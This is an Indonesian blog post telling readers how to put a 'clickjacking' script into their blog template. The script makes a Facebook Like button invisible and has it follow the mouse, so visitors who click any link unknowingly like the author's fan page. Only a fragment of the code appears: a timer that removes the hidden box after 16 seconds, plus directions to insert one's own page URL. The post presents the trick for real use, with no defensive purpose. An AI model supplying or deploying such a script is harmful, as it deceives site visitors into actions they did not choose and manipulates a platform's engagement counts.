Breaking News
Loading...
Sabtu, 28 Februari 2015

Pasang Tombol Like Facebook Transparan di blog




Banyak cara untuk mengajak orang lain bergabung ke fans page facebook kita, salah satu caranya dengan menggunakan script clickjacking,
tidak ada salahnya untuk mencoba trik ini, walau agak maksa yah hehehhe..... tapi gak di pasang juga gak apa-apa sih, hanya untuk menambah ilmu aja silahkan di coba

Cara pasang Auto Like Fans page Facebook ini dengan cara  memasangkan Script CLICKJACKING ke dalam Kode HTML template ataupun Widget/Gadget "HTML/Java script"

Clickjacking adalah Script yang bekerja dengan cara membuat tombol like/suka menjadi transparan atau tidak terlihat mengikuti cursor mouse kemanapun cursor tersebut bergerak !!!

Jadi ketika pengunjung mengklik salah satu link maka tanpa disadari pengunjung telah mengklik tombol like/suka tersebut kecuali pengunjung yang yang belum login atau tidak punya akun facebook maka akan keluar pop up / membuka window baru saat nge klik.

Berikut caranya :

Copy kode script dibawah ini lalu letakan di blog , kemudian paste  ditempatkan dalam  kode Widget/Gadget "HTML/Java script"



  • Note : https://www.facebook.com/pages/Listy-T-Shirt-Bandung/142176549176611 diganti dengan alamat Url facebook anda.
  •   setTimeout(function(){
        document.getElementsByTagName('body')[0].removeChild(lbox);
        window.removeEventListener('mousemove', mouseMove, false);
      }, 16000);

    Angka 16000 warna biru menunjukan lamanya waktu tombolnya muncul, bisa di atur sesuai selera

Selamat mencoba triknya,Semoga sukses :d


Sumber code : hack4rt.us

0 komentar:

Posting Komentar

 
Toggle Footer